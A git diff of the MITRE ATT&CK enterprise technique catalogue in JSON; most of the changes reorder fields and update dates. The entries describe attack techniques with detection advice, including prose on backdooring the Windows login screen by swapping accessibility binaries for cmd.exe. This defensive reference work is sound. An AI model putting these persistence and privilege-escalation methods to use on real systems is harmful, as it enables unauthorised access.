diff --git a/atomic_red_team/enterprise-attack.json b/atomic_red_team/enterprise-attack.json
index c07df17b..e1d2da04 100644
--- a/atomic_red_team/enterprise-attack.json
+++ b/atomic_red_team/enterprise-attack.json
@@ -1,6 +1,6 @@
{
"type": "bundle",
- "id": "bundle--16b0b40c-d9c3-46d4-97cc-11e94143ab9c",
+ "id": "bundle--4ee91158-54a2-4744-8722-be32f062b9e8",
"spec_version": "2.0",
"objects": [
{
@@ -56,23 +56,23 @@
],
"modified": "2020-03-24T16:28:04.990Z",
"created": "2020-01-24T14:13:45.936Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
],
+ "x_mitre_detection": "While users may customize their ~/.bashrc and ~/.bash_profile files , there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.",
"x_mitre_data_sources": [
"Process use of network",
"Process command-line parameters",
"Process monitoring",
"File monitoring"
],
- "x_mitre_detection": "While users may customize their ~/.bashrc and ~/.bash_profile files , there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.",
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
+ ]
},
{
"external_references": [
@@ -108,15 +108,15 @@
],
"modified": "2020-03-20T15:56:55.022Z",
"created": "2020-02-11T18:46:56.263Z",
- "x_mitre_platforms": [
- "Linux"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
+ "x_mitre_detection": "The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes attempting to access /etc/passwd and /etc/shadow, alerting on the pid, process name, and arguments of such programs.",
"x_mitre_permissions_required": [
"root"
],
- "x_mitre_detection": "The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes attempting to access /etc/passwd and /etc/shadow, alerting on the pid, process name, and arguments of such programs."
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Linux"
+ ]
},
{
"external_references": [
@@ -144,26 +144,26 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-27T12:18:44.286Z",
+ "modified": "2020-06-25T19:57:54.923Z",
"created": "2020-01-30T13:58:14.373Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor the file system for files that have the setuid or setgid bits set. Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).\n\nConsider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.\n\nOn Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.\n\nThere are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes.",
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
- ],
"x_mitre_data_sources": [
"Windows Registry",
"File monitoring",
"Process command-line parameters",
"API monitoring",
"Process monitoring"
+ ],
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
+ ],
+ "x_mitre_detection": "Monitor the file system for files that have the setuid or setgid bits set. Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).\n\nConsider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.\n\nOn Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.\n\nThere are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
]
},
{
@@ -227,19 +227,23 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-03-26T21:55:15.343Z",
+ "modified": "2020-04-16T19:37:02.355Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_defense_bypassed": [
+ "Windows User Account Control",
+ "System access controls",
+ "File system access controls",
+ "Heuristic Detection",
+ "Host forensic analysis"
],
- "x_mitre_effective_permissions": [
- "SYSTEM"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "2.0",
+ "x_mitre_contributors": [
+ "Tom Ueltschi @c_APT_ure",
+ "Travis Smith, Tripwire",
+ "Robby Winchester, @robwinchester3",
+ "Jared Atkinson, @jaredcatkinson"
],
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior. \n\nThere are many Windows API calls a payload can take advantage of to manipulate access tokens (e.g., LogonUser (Citation: Microsoft LogonUser), DuplicateTokenEx(Citation: Microsoft DuplicateTokenEx), and ImpersonateLoggedOnUser(Citation: Microsoft ImpersonateLoggedOnUser)). Please see the referenced Windows API pages for more information.\n\nQuery systems for process and thread token information and look for inconsistencies such as user owns processes impersonating the local SYSTEM account.(Citation: BlackHat Atkinson Winchester Token Manipulation)\n\nLook for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.",
"x_mitre_data_sources": [
"Authentication logs",
"Windows event logs",
@@ -248,20 +252,16 @@
"Process monitoring",
"Process command-line parameters"
],
- "x_mitre_contributors": [
- "Tom Ueltschi @c_APT_ure",
- "Travis Smith, Tripwire",
- "Robby Winchester, @robwinchester3",
- "Jared Atkinson, @jaredcatkinson"
+ "x_mitre_detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior. \n\nThere are many Windows API calls a payload can take advantage of to manipulate access tokens (e.g., LogonUser (Citation: Microsoft LogonUser), DuplicateTokenEx(Citation: Microsoft DuplicateTokenEx), and ImpersonateLoggedOnUser(Citation: Microsoft ImpersonateLoggedOnUser)). Please see the referenced Windows API pages for more information.\n\nQuery systems for process and thread token information and look for inconsistencies such as user owns processes impersonating the local SYSTEM account.(Citation: BlackHat Atkinson Winchester Token Manipulation)\n\nLook for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.",
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
],
- "x_mitre_version": "2.0",
- "x_mitre_is_subtechnique": false,
- "x_mitre_defense_bypassed": [
- "Windows User Account Control",
- "System access controls",
- "File system access controls",
- "Heuristic Detection",
- "Host forensic analysis"
+ "x_mitre_effective_permissions": [
+ "SYSTEM"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -278,7 +278,7 @@
},
{
"url": "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html",
- "description": "Glyer, C., Kazanciyan, R. (2012, August 20). THE \u201cHIKIT\u201d ROOTKIT: ADVANCED AND PERSISTENT ATTACK TECHNIQUES (PART 1). Retrieved June 6, 2016.",
+ "description": "Glyer, C., Kazanciyan, R. (2012, August 20). The \u201cHikit\u201d Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.",
"source_name": "FireEye Hikit Rootkit"
},
{
@@ -296,7 +296,7 @@
"id": "attack-pattern--9b99b83a-1aac-4e29-b975-b374950551a3",
"revoked": true,
"type": "attack-pattern",
- "modified": "2020-01-24T14:33:05.640Z",
+ "modified": "2020-05-13T20:37:30.008Z",
"created": "2017-05-31T21:30:26.946Z"
},
{
@@ -313,7 +313,7 @@
},
{
"url": "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html",
- "description": "Glyer, C., Kazanciyan, R. (2012, August 20). THE \u201cHIKIT\u201d ROOTKIT: ADVANCED AND PERSISTENT ATTACK TECHNIQUES (PART 1). Retrieved June 6, 2016.",
+ "description": "Glyer, C., Kazanciyan, R. (2012, August 20). The \u201cHikit\u201d Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.",
"source_name": "FireEye Hikit Rootkit"
},
{
@@ -325,6 +325,11 @@
"url": "http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/",
"description": "Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. Retrieved November 12, 2014.",
"source_name": "Tilbury 2014"
+ },
+ {
+ "source_name": "Narrator Accessibility Abuse",
+ "url": "https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html",
+ "description": "Comi, G. (2019, October 19). Abusing Windows 10 Narrator's 'Feedback-Hub' URI for Fileless Persistence. Retrieved April 28, 2020."
}
],
"object_marking_refs": [
@@ -332,7 +337,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Accessibility Features",
- "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nTwo common accessibility programs are C:\\Windows\\System32\\sethc.exe, launched when the shift key is pressed five times and C:\\Windows\\System32\\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as \"sticky keys\", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)\n\nDepending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\\, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.\n\nFor simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\\Windows\\System32\\utilman.exe) may be replaced with \"cmd.exe\" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\n\nOther accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)\n\n* On-Screen Keyboard: C:\\Windows\\System32\\osk.exe\n* Magnifier: C:\\Windows\\System32\\Magnify.exe\n* Narrator: C:\\Windows\\System32\\Narrator.exe\n* Display Switcher: C:\\Windows\\System32\\DisplaySwitch.exe\n* App Switcher: C:\\Windows\\System32\\AtBroker.exe",
+ "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nTwo common accessibility programs are C:\\Windows\\System32\\sethc.exe, launched when the shift key is pressed five times and C:\\Windows\\System32\\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as \"sticky keys\", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)\n\nDepending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\\, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.\n\nFor simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\\Windows\\System32\\utilman.exe) may be replaced with \"cmd.exe\" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\n\nOther accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)\n\n* On-Screen Keyboard: C:\\Windows\\System32\\osk.exe\n* Magnifier: C:\\Windows\\System32\\Magnify.exe\n* Narrator: C:\\Windows\\System32\\Narrator.exe\n* Display Switcher: C:\\Windows\\System32\\DisplaySwitch.exe\n* App Switcher: C:\\Windows\\System32\\AtBroker.exe",
"id": "attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -345,29 +350,29 @@
"phase_name": "persistence"
}
],
- "modified": "2020-03-24T19:11:19.022Z",
+ "modified": "2020-05-13T20:37:30.048Z",
"created": "2020-01-24T14:32:40.315Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_effective_permissions": [
+ "SYSTEM"
],
- "x_mitre_contributors": [
- "Paul Speulstra, AECOM Global Security Operations Center"
+ "x_mitre_permissions_required": [
+ "Administrator"
],
+ "x_mitre_detection": "Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious. Command line invocation of tools capable of modifying the Registry for associated keys are also suspicious. Utility arguments and the binaries themselves should be monitored for changes. Monitor Registry keys within HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options.",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"File monitoring",
"Windows Registry"
],
- "x_mitre_detection": "Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious. Command line invocation of tools capable of modifying the Registry for associated keys are also suspicious. Utility arguments and the binaries themselves should be monitored for changes. Monitor Registry keys within HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options.",
- "x_mitre_permissions_required": [
- "Administrator"
+ "x_mitre_contributors": [
+ "Paul Speulstra, AECOM Global Security Operations Center"
],
- "x_mitre_effective_permissions": [
- "SYSTEM"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -401,17 +406,13 @@
"phase_name": "impact"
}
],
- "modified": "2019-10-14T23:29:24.908Z",
+ "modified": "2020-07-14T19:15:29.911Z",
"created": "2019-10-09T18:48:31.906Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_data_sources": [
- "Windows event logs",
- "Process command-line parameters",
- "Process monitoring"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:\n\n* Event ID 4723 - An attempt was made to change an account's password\n* Event ID 4724 - An attempt was made to reset an account's password\n* Event ID 4726 - A user account was deleted\n* Event ID 4740 - A user account was locked out\n\nAlerting on [Net](https://attack.mitre.org/software/S0039) and these Event IDs may generate a high degree of false positives, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.",
+ "x_mitre_version": "1.0",
+ "x_mitre_impact_type": [
+ "Availability"
],
"x_mitre_permissions_required": [
"User",
@@ -419,11 +420,16 @@
"root",
"SYSTEM"
],
- "x_mitre_impact_type": [
- "Availability"
+ "x_mitre_data_sources": [
+ "Windows event logs",
+ "Process command-line parameters",
+ "Process monitoring"
],
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:\n\n* Event ID 4723 - An attempt was made to change an account's password\n* Event ID 4724 - An attempt was made to reset an account's password\n* Event ID 4726 - A user account was deleted\n* Event ID 4740 - A user account was locked out\n\nAlerting on [Net](https://attack.mitre.org/software/S0039) and these Event IDs may generate a high degree of false positives, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible."
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"id": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08",
@@ -449,22 +455,7 @@
],
"modified": "2020-03-26T15:27:59.127Z",
"created": "2017-05-31T21:31:06.988Z",
- "x_mitre_version": "2.1",
- "x_mitre_contributors": [
- "Microsoft Threat Intelligence Center (MSTIC)",
- "Travis Smith, Tripwire"
- ],
- "x_mitre_data_sources": [
- "Azure activity logs",
- "Office 365 account logs",
- "API monitoring",
- "Process monitoring",
- "Process command-line parameters"
- ],
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_permissions_required": [
- "User"
- ],
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -476,7 +467,22 @@
"Azure",
"SaaS"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_data_sources": [
+ "Azure activity logs",
+ "Office 365 account logs",
+ "API monitoring",
+ "Process monitoring",
+ "Process command-line parameters"
+ ],
+ "x_mitre_contributors": [
+ "Microsoft Threat Intelligence Center (MSTIC)",
+ "Travis Smith, Tripwire"
+ ],
+ "x_mitre_version": "2.1"
},
{
"object_marking_refs": [
@@ -520,28 +526,30 @@
"phase_name": "persistence"
}
],
- "modified": "2020-03-28T21:11:58.156Z",
+ "modified": "2020-07-15T12:43:37.469Z",
"created": "2017-05-31T21:31:12.196Z",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "2.1",
+ "x_mitre_contributors": [
+ "Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)",
+ "Praetorian",
+ "Tim MalcomVetter"
+ ],
+ "x_mitre_data_sources": [
+ "Authentication logs",
+ "Windows event logs"
+ ],
+ "x_mitre_detection": "Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017)\n\nMonitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.\n\nMonitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts.",
"x_mitre_platforms": [
"Windows",
"Office 365",
"Azure",
"GCP",
"Azure AD",
- "AWS"
- ],
- "x_mitre_detection": "Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017)\n\nMonitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.\n\nMonitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts.",
- "x_mitre_data_sources": [
- "Authentication logs",
- "Windows event logs"
- ],
- "x_mitre_contributors": [
- "Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)",
- "Praetorian",
- "Tim MalcomVetter"
- ],
- "x_mitre_version": "2.1",
- "x_mitre_is_subtechnique": false
+ "AWS",
+ "Linux",
+ "macOS"
+ ]
},
{
"external_references": [
@@ -577,21 +585,21 @@
],
"modified": "2020-03-24T12:40:02.331Z",
"created": "2020-01-19T16:59:45.362Z",
- "x_mitre_platforms": [
- "Office 365"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator"
+ ],
+ "x_mitre_detection": "Collect usage logs from cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. ",
+ "x_mitre_data_sources": [
+ "Office 365 audit logs"
],
"x_mitre_contributors": [
"Microsoft Threat Intelligence Center (MSTIC)"
],
- "x_mitre_data_sources": [
- "Office 365 audit logs"
- ],
- "x_mitre_detection": "Collect usage logs from cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. ",
- "x_mitre_permissions_required": [
- "Administrator"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Office 365"
+ ]
},
{
"external_references": [
@@ -637,23 +645,23 @@
],
"modified": "2020-03-26T17:34:02.877Z",
"created": "2019-11-07T19:52:52.801Z",
- "x_mitre_platforms": [
- "Windows",
- "Office 365"
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
],
+ "x_mitre_detection": "Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior",
"x_mitre_data_sources": [
"Process command-line parameters",
"File monitoring",
"Windows Registry",
"Process monitoring"
],
- "x_mitre_detection": "Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior",
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
- ],
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true
+ "x_mitre_platforms": [
+ "Windows",
+ "Office 365"
+ ]
},
{
"external_references": [
@@ -702,24 +710,25 @@
"phase_name": "persistence"
}
],
- "modified": "2020-03-28T21:11:57.894Z",
+ "modified": "2020-07-15T12:43:36.340Z",
"created": "2020-01-19T16:10:15.008Z",
- "x_mitre_platforms": [
- "Azure AD",
- "Azure"
- ],
"x_mitre_contributors": [
+ "Oleg Kolesnikov, Securonix",
"Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)"
],
- "x_mitre_data_sources": [
- "Azure activity logs"
- ],
- "x_mitre_detection": "Monitor Azure Activity Logs for service principal modifications.\n\nMonitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_detection": "Monitor Azure Activity Logs for service principal modifications.\n\nMonitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.",
+ "x_mitre_data_sources": [
+ "Azure activity logs"
+ ],
+ "x_mitre_platforms": [
+ "Azure AD",
+ "Azure"
+ ]
},
{
"id": "attack-pattern--4bf5845d-a814-4490-bc5c-ccdee6043025",
@@ -794,26 +803,26 @@
],
"modified": "2020-03-24T20:22:45.298Z",
"created": "2020-01-24T14:47:41.795Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_effective_permissions": [
+ "Administrator",
+ "SYSTEM"
],
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_detection": "Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Monitor the AppCertDLLs Registry value for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017) \n\nTools such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls Oct 2007)\n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.",
"x_mitre_data_sources": [
"Windows Registry",
"Process command-line parameters",
"Process monitoring",
"Loaded DLLs"
],
- "x_mitre_detection": "Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Monitor the AppCertDLLs Registry value for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017) \n\nTools such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls Oct 2007)\n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.",
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_effective_permissions": [
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "attack-pattern--317fefa6-46c7-4062-adb6-2008cf6bcb41",
@@ -898,28 +907,28 @@
],
"modified": "2020-03-24T20:34:09.996Z",
"created": "2020-01-24T14:52:25.589Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_system_requirements": [
+ "Secure boot disabled on systems running Windows 8 and later"
],
+ "x_mitre_effective_permissions": [
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_permissions_required": [
+ "Administrator"
+ ],
